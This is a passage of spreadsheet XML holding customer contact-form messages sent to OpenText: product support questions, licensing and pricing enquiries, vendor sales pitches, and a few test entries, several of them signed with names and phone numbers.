We are currently working on a project where the client is looking to create a flat file from SAP and contract a vendor to transform the message to send to different banks globally._x000D_
_x000D_
Is this something you could assist with, if so, could someone reach out at earliest convenience? _x000D_
_x000D_
Thanks,_x000D_
Priscila</t>
  </si>
  <si>
    <t xml:space="preserve">talk to someone about having downloadable technical manuals with protection and security.  We will not need a shopping cart tool.  we only need the document in a downloadable format with watermarks, print, copy and file transfer security rights. </t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon, _x000D_
_x000D_
I am an Employment Support Specialist at Causeway Work Centre.  As a non-profit organization, Causeway Work Centre has been helping employers connect with talent in our community for over 35 years. Through our various employment support programs, social enterprises and entrepreneurial programs, we have helped Ottawa’s diverse workforce find opportunities for meaningful employment. We are supported by the Ministry of Community and Social Services and the United Way, and are a proud member of the EARN initiative._x000D_
_x000D_
I am currently working with Marina Ross who offers 3 years of experience in  Web/Software Development.that would fit well in the OpenText arena. I would welcome an opportunity to send her your resume and to speak with you regarding how she could be an asset to your company._x000D_
_x000D_
_x000D_
Thank you for your time, and I look forward to hearing from you._x000D_
_x000D_
_x000D_
_x000D_
Diane Owen_x000D_
Employment Supports Specialist_x000D_
Causeway Work Centre _x000D_
dowen@causewayworkcentre.org_x000D_
22 O’Meara Street Ottawa ON, K1Y 4N6_x000D_
C (613) 266-5893_x000D_
T (613) 725-3494 ext:111_x000D_
F (613) 725-9913_x000D_
www.causewayworkcentre.org_x000D_
          _x000D_
  Empowering people, strengthening our community _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hi, I am curious about how OpenText might be a possible alternative to the documentation system we are currently using. I believe our organization has purchased, or is in the process of purchasing OpenText products. And I help oversee one of our departments current internal documentation system, which has been okay, but definitely has its limitations. Just curious how OpenText would work in this area. In our current system we write, edit, and publish documentation that outlines company policies, procedures, processes, and general information. Would OpenText be able to help us do this better?</t>
  </si>
  <si>
    <t xml:space="preserve">Need assistance with problem with RightFax on Copier. </t>
  </si>
  <si>
    <t xml:space="preserve">Need assistance with a Tower Technologies IDM System </t>
  </si>
  <si>
    <t xml:space="preserve">Just reaching out after HIMSS to share something you might find interesting._x000D_
_x000D_
We run a very successful inside sales center for companies like Opentext.  $500,000/yr minimum investment for a handful of reps._x000D_
_x000D_
$6 BILLION of incremental revenue for our clients in 2016.  Simply put we can help you achieve much BETTER SALES!_x000D_
_x000D_
Please have a VP of Sales or Marketing get back to us._x000D_
_x000D_
Thanks,_x000D_
Jason_x000D_
</t>
  </si>
  <si>
    <t>Trying to download OpenText</t>
  </si>
  <si>
    <t>Fax2email isn't working</t>
  </si>
  <si>
    <t>Hello To Whom It May Concern,_x000D_
We are in the process of updating our Vendor Files,  as one of our vendors that need to provide us with a updated copy of our Vendor Registration Form and W-9.</t>
  </si>
  <si>
    <t>i lost my old castelle faxpress cd and activation key, can i get the software and key? thanks !!!</t>
  </si>
  <si>
    <t xml:space="preserve">Estimate request for new version of RightFAX server. _x000D_
Current Version 9.4 </t>
  </si>
  <si>
    <t>I JUST downloaded your free viewer (V.16) &amp; when I try to open my electrician's as-built drawings I get an error message indicating that I need to update.  When I click on 'Update' I go to your web site where I receive a "\Page not found" error message._x000D_
I tried uninstalling/reinstalling with same results.</t>
  </si>
  <si>
    <t>We need to evaluate rightFax for FOIP fax service offering.   Please let me know if we can have a session to discuss our requirements.</t>
  </si>
  <si>
    <t>Simple question. We are using BiQuery and we would like to know  if it's exchange/Active directory 2016 compatible?</t>
  </si>
  <si>
    <t>Dye &amp; Durham processes over 250,000 pages of legal and land title documents per year.  We would like to automate the data capture processes for those documents as well as automating the vetting of those documents for consistency and completeness. _x000D_
_x000D_
I would like to discuss the cost of using Captiva to complete that data capture and vetting process. _x000D_
_x000D_
Thanks, _x000D_
_x000D_
Tony Ogmundson</t>
  </si>
  <si>
    <t xml:space="preserve">We are currently running VPOM 5.4.5.  The GUI shows version 5.4.5.28.  Will this run on a Windows10 laptop? </t>
  </si>
  <si>
    <t>Hi There,_x000D_
My previous colleague (Sheldon Fougere) had a OpenText Customer Support maintenance contract set up with you guys. I need access on my account to our OpenText Customer Support maintenance contract. I have several outstanding issue sthat need to be resolved right away. _x000D_
_x000D_
Thank you,_x000D_
_x000D_
Malerie MacDonald_x000D_
Client Support Technician_x000D_
Information Technology  Services_x000D_
Health Association Nova Scotia_x000D_
2 Dartmouth Road_x000D_
Bedford NS  B4A 2K7_x000D_
Office: (902) 832-8546_x000D_
Cell: (902) 817-9746_x000D_
Email:  malerie.macdonald@healthassociation.ns.ca_x000D_
Website:  www.healthassociation.ns.ca</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning,_x000D_
_x000D_
I am a local yoga instructor and I provide weekly yoga classes for employees at different companies and corporations.  I found Open Text in Waterloo Areas Top Employers, and I wanted to inquire about whether you have a Wellness Program in effect in order to provide employees with a possible lunch hour or after work yoga program once a week.  The benefits of yoga in the workplace are extensive and have shown to improve productivity and community at work, among other things._x000D_
_x000D_
If you are interested, I would love to discuss a day or time that might work for you and your employees weekly.  Thank you for your time, and I look forward to hearing from you._x000D_
_x000D_
Megan Simpson - RYT500_x000D_
</t>
  </si>
  <si>
    <t>We have Right Fax support through Open Text which we purchased through SHI.  My purchasing dept just said you no longer accept through SHI.  Is this accurate?  Who should we contact?</t>
  </si>
  <si>
    <t>request an account for support._x000D_
i give the support contract and license number but i can't access to support ????</t>
  </si>
  <si>
    <t>We recently updated our RightFax to version 10.6; with the previous version I was able to use the arrow keys and the page up and page down keys on the keyboard to scroll up and down to view the page in its entirety (getting from top of page down to bottom of page and back up).  Now with 10.6 version I am not able to use the arrow keys - not even with shift or alt; page up  and page down takes me from page to page (shift page up and shift page down does not scroll the page up and down either).  I am not able to find anything in the help section on how to use my keyboard keys to scroll from top of page down to the bottom and back up - I am only able to scroll using my mouse. What is it do I need to do with Rightfax version 10.6 to be able to use my keyboard keys to scroll</t>
  </si>
  <si>
    <t xml:space="preserve">Quote needed for a customer. </t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
Merci de nous éclairer à propos de notre situation au sujet de notre contrat de maintenance. Suite à une migration de Alchemy 8.2 vers 9, vers une nouvelle plateforme Windows, nous rencontrons des difficultés pour obtenir un SUID définitif correspondant._x000D_
End User Number: EU0096606_x000D_
SUID 41761-12170._x000D_
Bien cordialement_x000D_
Daniel Favier_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">get a price for Brava </t>
  </si>
  <si>
    <t xml:space="preserve">" _x000D_
Hello,_x000D_
 _x000D_
I am Mary Humphrey (Marketing consultant). I would like to know that are you looking for Digital marketing service to rank your Website organically in Top positions of Google top page?._x000D_
 _x000D_
If you are interested please share keywords idea, if you have else our team will suggest you relevant keywords according to your website._x000D_
 _x000D_
There will be no set up fee or no any other hidden charge. So you just have to pay your monthly fee according to the plan only._x000D_
 _x000D_
If yes, So that we can analyze your site and give you best packages accordingly. For easily communication you can share your Skype id and contact number._x000D_
 _x000D_
Cheers_x000D_
Mary Humphrey""_x000D_
 "_x000D_
</t>
  </si>
  <si>
    <t>we are looking for corporate trainer for one of our client's requirement for EMC-Infoarchive._x000D_
Please let us know if you provide .</t>
  </si>
  <si>
    <t xml:space="preserve"> I would like to confirm with OpenText that Greensboro is the sole support vendor for OpenText RightFax in HK region. _x000D_
_x000D_
According to your website, we can only find "Greensboro" for supporting RightFax in Hong Kong. _x000D_
_x000D_
http://www.opentext.com/what-we-do/partners-and-alliances/partner-directory?state=%7B%22orderBy%22%3A%22regions%22%2C%22filters%22%3A%7B%22products%22%3A%5B%22BN%20-%20F%26DD%20-%20RightFax%22%5D%2C%22regions%22%3A%5B%22China%2FHK%22%5D%2C%22types%22%3A%5B%22Support%22%5D%7D%2C%22shownResults%22%3A0%7D</t>
  </si>
  <si>
    <t>Dear Sirs, _x000D_
_x000D_
I am contacting You on behalf of Croatian gas TSO. Could You please  give us an offer regarding Your AS4 software solution. We are in need for licencing of two production servers, two failover servers and one test server. Also, we need support, preferably 24/7 and if possible support for/on site installation of Your software solution. Please contact me via this email for further clarification of planned connections via AS4._x000D_
_x000D_
Thank You!</t>
  </si>
  <si>
    <t>Hi there, I'm wondering if there is a way to get a list of all documents and their URL/URIs from opentext, either by the interface or by using the API._x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>How can i get freeDWG viewer license to embed activex_x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">We at “TOSS the COIN” focus on Market Process Outsourcing. Essentially your one stop outsourced marketing department._x000D_
_x000D_
We come with more than 20 years of experience in pre-sales and marketing in the technology industry. We understand your industry, your work, your customers and your lingo. Over the years, we have gained immense experience in Branding, Communications, Marketing, Pre-sales, Research and PR. We have created a niche for ourselves in the IT and ITeS industry. _x000D_
_x000D_
We believe in the mantra of keeping all our works Creative, Original, Inexpensive and Neat. Reach out to us for consultation or outsourcing. We can fit many sizes based on your enterprise. _x000D_
_x000D_
Thanks for your time and looking forward to take this conversation ahead._x000D_
 _x000D_
Attached is a quick introduction on us._x000D_
Follow us on https://www.facebook.com/tossthecoinindia _x000D_
Website: www.tossthe.co.in_x000D_
 _x000D_
Also watch our latest on “Traditional Innovation” we adopt for UX consulting - https://www.linkedin.com/pulse/traditional-innovation-we-got-right-reshma-budhia?trk=v-_x000D_
</t>
  </si>
  <si>
    <t>Dear Support,_x000D_
One of our customer required the integration of SharePoint 2016 and Open Text CS. So I request you to kindly provide us which product is suitable for this and the licence details.._x000D_
Thanks and Regards,_x000D_
Boby</t>
  </si>
  <si>
    <t>Hello._x000D_
This is a test mail._x000D_
Please ignore this email._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to schedule a demo for the OpenText Email Archiving for Microsoft Exchange. Also please let me know if there is an OpenText solution for file server archiving._x000D_
_x000D_
thank you_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Could you please provide me with the export control classification number (ECCN) for Open Text NFS Server v. 14? Thanks. </t>
  </si>
  <si>
    <t>Please help Arizona State University become more sustainable and remove the following address from your Direct Mailing List. All Collection Development (https://lib.asu.edu/colldev/) communications should be directed to our main branch at:_x000D_
Hayden Library_x000D_
P.O. Box 871006_x000D_
Tempe AZ 85287_x000D_
_x000D_
REMOVE:_x000D_
_x000D_
ARIZONA STATE UNIVERSITY_x000D_
4701 W THUNDERBIRD RD_x000D_
GLENDALE AZ 85306_x000D_
US</t>
  </si>
  <si>
    <t>In Active Catalog I am trying to set up 8 UPCs and getting an error that they are already set up. They are not in our catalog, but we are the manufacturer.</t>
  </si>
  <si>
    <t>i am working with verizon  on a tech refresh on some hardware and we are trying to find out if BERT server is supported on solaris 11</t>
  </si>
  <si>
    <t>Please email a copy of your W-9. We are updating our files. Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">My name is Paul Smith associated with InfoGlobalData, a Data Intelligence firm based out of Seattle, WA._x000D_
_x000D_
Would you be interested acquiring a contact Information from Construction Industry?_x000D_
_x000D_
List Include: Trade Contractors, Home Builders, Architects, Remodelers, General Contractors, Grading Contractors, Roofing Contractors, Siding Contractors, HVAC Contractors, Engineers, Real Estate Agents &amp; Offices, Landscapers, Dealers, Designers, Manufacturers &amp; Supplier, Electric Contractors, etc._x000D_
_x000D_
Job Title: Executive director, Chief Financial Officer , Vice president design and construction, Senior project manager, Senior estimator, Senior structural design engineer , Director facilities management, Director of operations, Chief Facilities Officer, Architect, CAD Manager, Maintenance Manager, Dispatch Manager, Civil Engineer, Design Engineer ,Plant Engineer, Electrical Engineer, Engineering Manager, Product Engineer , Property Manager, Equipment Operator, Field Engineer, Purchasing Manager, Project Manager, Safety Director, etc._x000D_
_x000D_
Geography: USA, Canada, UK, Europe, Middle East &amp; Asia._x000D_
_x000D_
If interested, do let me know what type of Target Audience/Job title/Geography you are looking for?_x000D_
_x000D_
Respectfully,_x000D_
_x000D_
Paul Smith_x000D_
InfoGlobalData_x000D_
</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
I was wondering if you would be interested in our database of Key IT decision makers? _x000D_
_x000D_
Business titles include-_x000D_
_x000D_
CTO's, CIO's, Chief Architect, VP/Director/SVP/Application Development, Solutions Architect, Infrastructure Managers, Data Center Owners/Manager/Directors, Systems Software Manager, Developer, Manager Information Services, Network and Communications Managers, Data Center and Cloud architects, Information Technology Project Manager, Network Manager, VP/Director of IT, IT Manager, Product Management, Engineering, BI Analysts, BI Architects, Data Analysts so on._x000D_
_x000D_
We can also provide you with_x000D_
_x000D_
Industry breakdown_x000D_
_x000D_
Geographic breakdown_x000D_
_x000D_
Employee size breakdown_x000D_
_x000D_
Key contact identification_x000D_
_x000D_
Kindly let me know your target criteria so that we can provide you exact counts associated with you criteria:_x000D_
_x000D_
Look forward for your response._x000D_
_x000D_
Regards,_x000D_
Jake Brown_x000D_
Marketing Manager</t>
  </si>
  <si>
    <t>Dear OpenText Team,_x000D_
I'm contacting you on behalf on Jimmy Choo Ltd. Jimmy Choo Ltd ( UK ) has started a process in order to become EDI with their US Customers. I would like to know what the steps are in order to get a GXS EDI Catalogue account so that Jimmy Choo Ltd can start publishing their products._x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Gabriele</t>
  </si>
  <si>
    <t>Hello.  Could you please let me know if Brava!™ for EMC Documentum Webtop provides the following features for multi-page TIFF files;_x000D_
·         Delete pages_x000D_
·         Duplicate pages_x000D_
·         Move pages within the file_x000D_
·         Paste in pages from other TIFF files_x000D_
·         Rotate pages_x000D_
·         Mark-up pages_x000D_
·         Highlight pages_x000D_
·         Perform OCR on pages_x000D_
·         Perform searches on the OCR'd text_x000D_
·         Export the OCR'd text_x000D_
·         Zoom in/out on pages_x000D_
·         View multi-page TIFFs_x000D_
Thank you!_x000D_
- Mike</t>
  </si>
  <si>
    <t xml:space="preserve">We want to renew Documentum &amp; Captiva Licenses for a client in Nigeria. We discovered Opentext bought over EMC documentum. We will like to know who can help us treat our request. Please email response to Helpdesk@hutchlamservices.com &amp; patroya@hutchlamservices.com .Thanks </t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
_x000D_
I am writing you concerning a sponsorship opportunity with the Fun Coding For The Community (FC2) project initiated by the Rideau-Rockcliffe Community Resource Centre/Ottawa (RR-CRC). RR-CRC provides a range of social supports and services that enable the empowerment of residents, community resilience, and the inclusion of all._x000D_
_x000D_
The idea of this project came out with the thought of that every 21st century student should have a chance to learn about algorithms, apps and the Internet just like they learn about the digestive system, electricity and gravity. Therefore we initiated the Fun Coding For The Community project for low-income kids and youth, age from 8 to 15, with the goals of;_x000D_
_x000D_
Developing analytical thinking,_x000D_
Boosting problem solving in school and social life,_x000D_
Have a positive effect in academic life,_x000D_
Prepare the children for the future._x000D_
_x000D_
The classes will be held at the Rideau-Rockcliffe Community Resource Centre but we are in need of laptops and funding for the tutors. The laptops do not have to be the latest and greatest ones. A used 3 to 6 year old laptop with wireless connectivity and web browser capability would be sufficient for this project. The classroom will be for 15 students, and therefore we need 15 laptops in total. Since the activity will continue throughout the year we are also in need of 1000 CAD per month of funding for the tutoring expense._x000D_
_x000D_
As appreciation for your support;_x000D_
We will put sticker type logos of your company on the donated laptops_x000D_
We will put banners in the classroom providing funding for the project._x000D_
_x000D_
With the help of your generous donations and funding, the project will provide a better future for low-income kids._x000D_
_x000D_
Many thanks._x000D_
_x000D_
Mustafa Altinkaya _x000D_
Volunteer at RRCRC</t>
  </si>
  <si>
    <t>Check balance for Elite Point to apply to OTEW training</t>
  </si>
  <si>
    <t>interested to find out more about the opentext product and how can it fit into my big data road map.</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning, _x000D_
_x000D_
I am looking to get in touch with someone from HR/Payroll in order to obtain a verification of employment. Any help you can provide is appreciated!_x000D_
Thank you. _x000D_
_x000D_
Lauren Smith_x000D_
LOAN PROCESSING ASSISTANT_x000D_
DIRECT	480 500 3454_x000D_
OFFICE	480 627 0100_x000D_
FAX	480 500 3354_x000D_
lauren.smith@imortgage.com_x000D_
</t>
  </si>
  <si>
    <t>Need to review how we can work together. 416-884-2339 www.peocanada.com</t>
  </si>
  <si>
    <t>Need to upgrade our Rigthfax server</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I am writing to check if you would be interested in reaching out to the users of Oracle E-Business Suite, Cloud/Fusion Applications, Oracle EPM/Hyperion, Primavera EPPM, EBS Extensions for Endeca, CRM On Demand, Siebel CRM, BI and EPM._x000D_
_x000D_
We can provide you a customized database, which can be used for Email Marketing, Telemarketing and Direct Mailing.  Please let me know if you are interested and I can send you samples, counts and cost details._x000D_
_x000D_
If there is someone else responsible for this regards, I would greatly appreciate if you can refer them to me_x000D_
_x000D_
Thank you for your attention. I look forward to hearing from you._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
We would like to understand the current service we have with GXS catalog please ?_x000D_
We would like to check the feasibility to connect to other partners and change the upload file that we currently use for our products but we are not sure of the current process in place we need to follow._x000D_
_x000D_
We also would know what is the primary point of contact for SMCP in order to contact GXS._x000D_
_x000D_
Thank you._x000D_
Regards,_x000D_
Carole </t>
  </si>
  <si>
    <t>Good Morning:_x000D_
_x000D_
I work for the State of Washington and we currently use Captiva Capture as our scanning solution.  EInput is at the end of life (we have extended support until Dec 2017).  I see the replacement for this remote application is Captiva Web Client which uses Captiva Rest Services.  We would like more information on transitioning from the use of eInput to CWC.  Please give me a call at your earliest convenience to discuss our options.  _x000D_
_x000D_
Thank you,_x000D_
Linda Ashborn</t>
  </si>
  <si>
    <t>Regarding Distance learning , Virtual classrooms and E-Learning !</t>
  </si>
  <si>
    <t>Export Control Classification Number for Office Editor version 16.0.3.</t>
  </si>
  <si>
    <t>Our EDI Seeburger production system is not able to connect to GXS Server for France._x000D_
Refer to: Ticket#1-2856418240 - Triumph International-GB01-G900031</t>
  </si>
  <si>
    <t>Markterkundung DMS</t>
  </si>
  <si>
    <t>Cannot access My support website to download software and licences for purchased Brava Software - Invoice# SUS08758260_x000D_
End User # EU0275929</t>
  </si>
  <si>
    <t>our company is interested in becoming a partner, we would like to receive some further information about this. Many thanks in advance. Kind regards, Adrienne Kranenburg</t>
  </si>
  <si>
    <t>Bonjour, _x000D_
Je voudrais savoir en quelle langue aurons lieu les différents ateliers et conférences lors de l'Innovation Tour Paris 2017 svp ?_x000D_
Merci</t>
  </si>
  <si>
    <t>Dear support,_x000D_
I work for Adient company (originated in 2016 year  after separation from JCI), I need access to the knowledge base articles.Na you please grant this access to my user?_x000D_
thanks_x000D_
regards Tomas Micuda</t>
  </si>
  <si>
    <t>We would like to build a new business proposal between both the organisations which will work effectively.</t>
  </si>
  <si>
    <t>Hallo, _x000D_
_x000D_
Können Sie mir Informationen liefern über die Integration zwischen SAP S/4HANA und Open Text VIM? _x000D_
_x000D_
Danke_x000D_
_x000D_
Grüssen_x000D_
Bart</t>
  </si>
  <si>
    <t>Hallo, _x000D_
Können Sie mir Informationen liefern über die Integration zwischen SAP S/4HANA und Open Text VIM? _x000D_
_x000D_
Danke_x000D_
_x000D_
Grüssen,_x000D_
_x000D_
Bart</t>
  </si>
  <si>
    <t>Solicitamos orçamento para realizar transações bancários: Contas a Receber (Emissão de Boletos), Contas a Pagar (Portal para pagamento a fornecedores, impostos) e Tesouraria (Conciliação Bancária).</t>
  </si>
  <si>
    <t>website http://www.opentext.com/what-we-do/products/analytics/opentext-analytics-workshops  is out of date. When are next sessions scheduled?</t>
  </si>
  <si>
    <t>Bonjour Messieurs,_x000D_
_x000D_
Je souhaiterai savoir s'il y a des cessions de formations sur XML et JAVA</t>
  </si>
  <si>
    <t>Kindly provide opentext 7.5 documentation links for installations/configuration.</t>
  </si>
  <si>
    <t>We currently are bidding for an RFP for a Digital Asset Management Solution.  We would like to have a demo of Opentext and see if it meets the requirements of the RFP.  We would also need pricing as well.  Kindly get in touch to take this further.</t>
  </si>
  <si>
    <t>About to undergo a digitisation process of all our records, with an aim to transfer them to The National Records Office</t>
  </si>
  <si>
    <t xml:space="preserve">I have read that QuickScan Pro from EMC is now "OpenText Captiva QuickScan Pro". Can you confrm that? If it is true, what happens to the former EMC licenses, maintenance contracts and support? EMC support has ended January 2017.  </t>
  </si>
  <si>
    <t>Single</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
Get instant result for your sales campaign, by acquiring qualified  SharePoint  Technology users email list._x000D_
_x000D_
Exactly  2,044  customers are ready to buy Leads of  SharePoint  technology from  Australia._x000D_
_x000D_
Kindly revert with your requirement for a free sample and additional information. _x000D_
_x000D_
Regards,_x000D_
Cathy Henry_x000D_
Email- cathy.henry@instant-lead.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Need a demo link</t>
  </si>
  <si>
    <t xml:space="preserve">Our vendor TT (Tourism Technology) are having issues connecting to Invoices VH ftp server. The error that is showing is : username and/or password was not accepted for login. TT has adviced us to contact Expedite to get the correct credentials. Please help. Many thanks._x000D_
</t>
  </si>
  <si>
    <t>i need learning</t>
  </si>
  <si>
    <t xml:space="preserve">I have a client that needs a data management system and I am looking to see what features Open Text offer compared to competitors. </t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
we are using a valid licensed OpenText archiving application through SAP. now the issue is non of our colleagues doesnt have full access to open text site to open my support or download SAP related VIM patches etc. kindly help us to get the following information._x000D_
we know end user ID and i have mentioned below._x000D_
Account End User ID is EU00128196_x000D_
_x000D_
could you please provide following informaion:_x000D_
Product Line (required)_x000D_
Name of Co-worker_x000D_
System ID/Serial Number/PIN/VPS</t>
  </si>
  <si>
    <t>vacancy for a NOC engineer</t>
  </si>
  <si>
    <t>hiiii sir im sonu rayni im elections work im a2z all reparijsir im what viza Canada im with 4u sir thanxx sir</t>
  </si>
  <si>
    <t>Need to license some browser based redaction software for a hosted application for a police department. Please email to set up a phone call.</t>
  </si>
  <si>
    <t xml:space="preserve">What is weight of Ambulatory Transceiver ? </t>
  </si>
  <si>
    <t>send all information listing products affected by CVE-2017-5638: Apache Struts Jakarta Multipart Parser Remote Code Execution Vulnerability_x000D_
_x000D_
I do not have time to go through my OpenText support account.. Please be proactive and send ASAP</t>
  </si>
  <si>
    <t xml:space="preserve">Want to know about Enterprise Content Management </t>
  </si>
  <si>
    <t>Dear opentext team,_x000D_
_x000D_
We are looking for a document management solution._x000D_
Can you please send me some details about your product (details features, pricing for on premises installation)._x000D_
We are interested with the installation on premises only and not on cloud._x000D_
_x000D_
Also, if you can mention some banks that have implemented this product in Lebanon and the middle east region._x000D_
_x000D_
Thank you,_x000D_
Best Regards.</t>
  </si>
  <si>
    <t>Hello, We are long time users of Application Xtender 15 years.  Recently purchased by Dell and now OpenText.  I have requested a license key on November 21st 2016 and just received confirmation that OpenText is going to process my order. 3.5 months after my request.  This is a very disappointing response from OpenText we pay aprox $40,000  per year and this is the support received.  If this is OpenText operating capacity we will if possible avoid using any OpenTxt products.  I would like a call explaining the unreasonable response time and support we have received.</t>
  </si>
  <si>
    <t xml:space="preserve">Open Text query for Deloitte Caribbean and Bermuda Countries </t>
  </si>
  <si>
    <t>I am with a consulting company that is looking to use and potentially market to our clients a visual project management data reporting system.  We are looking at data visualization software that will allow us to do that and companies with which we can have a mutually beneficial relationship with.  The data that we anticipate using is relatively simple project plan/management/progress data which will be fairly standard at each site.  The key for us is to be able to offer some valuable predefined visualizations which can be slightly changed at each site for a reasonable price.</t>
  </si>
  <si>
    <t>OpenText CloudFax review</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to find out what does it take to obtain tech support and how much it would cost. I am presuming the support contract needs to be renewed. Cost and procedure please. </t>
  </si>
  <si>
    <t>Interested in ProVision Enterprise Architecture Software</t>
  </si>
  <si>
    <t>test, ignore</t>
  </si>
  <si>
    <t>My name is Martin Dzatko and I am scouting on the Second Season of the TV Show called the “Girlfriend Experience”. This series is based on the Stephen Soderbergh feature of the same name and he is also acting as the executive producer. The first season was a commercial success with our lead actress, Riley Keogh being nominated for a Golden Globe.  The story revolves around political corruption involving an escort “spying” for a Super-Pac (political action committee.)  _x000D_
_x000D_
I believe the Toronto Offices would be a great look for for one of the locations that we are looking at for a one time filming event.  This would be for filming for one day between April 1 and April 9, 2017 (on the weekend only).   We would pay a location fee of $10,000.00 for the film day and a portion thereof  for a prep day if needed.  We also provide insurance protecting the property as well.  We would commit to extensive site-protection to ensure the property and contacts are not damaged. _x000D_
_x000D_
We would hire a staff member to attend to our crew whenever they are on site at a weekend overtime rate paid directly to your staff member.   Moreover we have a smaller crew of 50 people with only 35 crew members on site at any given moment.  Our lighting and grip packages are also smaller and thus there is less impact and less chance of damage.  _x000D_
_x000D_
Many thanks for taking the time to review this filming request as I look forward to discussing the project.</t>
  </si>
  <si>
    <t xml:space="preserve">Would like more information on Enterprise Content Management and it's pricing. We are looking to utilize for auto responders to our site.  </t>
  </si>
  <si>
    <t>Our company is interested a document control software provided by your company and would appreciate you getting in contact with us to get more information on your services.</t>
  </si>
  <si>
    <t>Information about Exstream products as a possible add-on to one of our solutions. My preferred contact method is e-mail. Thank you, Angelo</t>
  </si>
  <si>
    <t xml:space="preserve">I would  like to get some information about how Opentextcapture center works ? Is it a client-driven system where clients have to select the relevant data that needs to be retrieved from a form ?! </t>
  </si>
  <si>
    <t>Looking for marketing contact to discuss exhibiting at upcoming tradeshow_x000D_
http://www.prismintl.org/events/2017annual/prism-2017-annual-conference-overview.html</t>
  </si>
  <si>
    <t>I was just checking out your site, and was very impressed._x000D_
You guys really do some great work._x000D_
Have you considered adding animated videos or 3D videos to your portofolio?_x000D_
My team, located in Israel, helps businesses like yours by creating 60-90 second videos to explain their business at affordable rates with quality that cannot be beaten.._x000D_
Want to hear more?_x000D_
You can check out our work at explainyourpitch.com._x000D_
We are eager to hear back from you!_x000D_
Greetings from Jerusalem,_x000D_
Lynn Ellis</t>
  </si>
  <si>
    <t xml:space="preserve">Vi behöver uppgradera vår godsflagga till ny GM standard. Vår konsult på Istone känns lite svajig. Har Ni redan mallen, så köper vi den av Er._x000D_
Mvh_x000D_
Niklas </t>
  </si>
  <si>
    <t>hello , would tell me please  with witch command i can read the following bases :  DM_Msg    DM_ArcS  DM_ArcD  DM_ActS. That's will help me to understand the origin of an A.I translation problem   between  an old site(UNIX) and a new one on LINUX.  Tha,ks for your help.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We have a new employee and need a new account simular to my account._x000D_
What do you need?_x000D_
_x000D_
Thank you in advance_x000D_
Marcel</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning OpenText Colleagues,_x000D_
 _x000D_
The IRS has an urgent need to establish an enterprise case management capability.  The IRS has tasked MITRE with conducting an examination of the functionality provided by a representative sample of commercial enterprise case management systems.  This is not an evaluation of how enterprise case management systems can meet IRS business requirements or current legacy system requirements, but rather an understanding of the functionality provided by commercial software that is available out of the box with no configuration.  To support this examination, MITRE and the IRS are requesting invited vendors to assist by 1) providing resources/licenses for examination, 2) assisting with the installation of their case management systems to MITRE’s labs at McLean, VA, 3) support demonstrations and walkthroughs of their case management system highlighting key features, and 4) demonstrating their ability to configure their case management system to meet high-level operational scenarios._x000D_
 _x000D_
This examination is beginning now with the delivery of a report of our examination to the IRS by 11 May 2017.  The results of this examination will lead to the development of an RFP to acquire an enterprise case management system for the IRS by October 2017.  The results of this examination will not be provided to the participating vendors.  They will be used by the IRS to inform the development of the RFP requirements._x000D_
 _x000D_
Please advise if your company can support this immediate request. I am happy to answer any questions on logistics/timeline, etc._x000D_
 _x000D_
Kind regards, _x000D_
 _x000D_
Angela _x000D_
 _x000D_
Angela O’Hanlon, Ph.D_x000D_
The MITRE Corporation_x000D_
703 983 2327_x000D_
703 268 8323_x000D_
amcintee@mitre.org_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>I see folders for Images, Dat and Pro. Can you tell me what folder actually contains? (are they pointers, actual scanned in images, etc.) Does the Image folder actually contain all images scanned into Alchemy?</t>
  </si>
  <si>
    <t>Would OpenText be a cost efficient option for sunsetting a SAP P3M solution and only retaining lookup functionality?</t>
  </si>
  <si>
    <t>Dear Madams and Sirs,_x000D_
our company is a reseller of a software on territory of Kazakhstan, We would like to participate in contest, which is held by Nazarbayev  University Library and IT Services. This is our customer and she wants to renew  following products: EMC Documentum Platform Bundle - 51 licenses, and EMC  Documentum Custom Client - 51 licenses._x000D_
In this regard we would like to have a quota for above mentioned products._x000D_
_x000D_
Many thanks in advance and looking forward to your reply.</t>
  </si>
  <si>
    <t>Would you be interested in a possible design/development of your website with additional features?_x000D_
_x000D_
We provide back end Web Development support to a number of agencies and have expertise in :-_x000D_
_x000D_
1) Developing highly effective corporate website_x000D_
2) Mobile responsive_x000D_
3) E-commerce store_x000D_
_x000D_
Please do let us know in case you have any questions. Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">What is the pricing for upgrading the trial iHub to licensed iHUB. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
I have a problem when I try to register to community to download the developer edition of Documenti. More specifically I've getting this error:_x000D_
_x000D_
CDO.Message.1 error '80070070'_x000D_
_x000D_
There is not enough space on the disk._x000D_
_x000D_
/developer/include/functions.asp, line 49 </t>
  </si>
  <si>
    <t>I would like to ask if the following scanners are compatible with OpenText?_x000D_
_x000D_
- Kodak i2400_x000D_
- Canon DR-MR160 i or ii_x000D_
- fi-6670_x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>I have to cancel my registration for the innovation tour in Stockholm March 29th.</t>
  </si>
  <si>
    <t xml:space="preserve">Bitte um Info, welche Version von Archive Server geschult wird, konkret bei dem Kurs beginnend am 15. Mai 2017 in München._x000D_
http://www.opentext.com/training/coursedetails.html?id=1324_x000D_
_x000D_
</t>
  </si>
  <si>
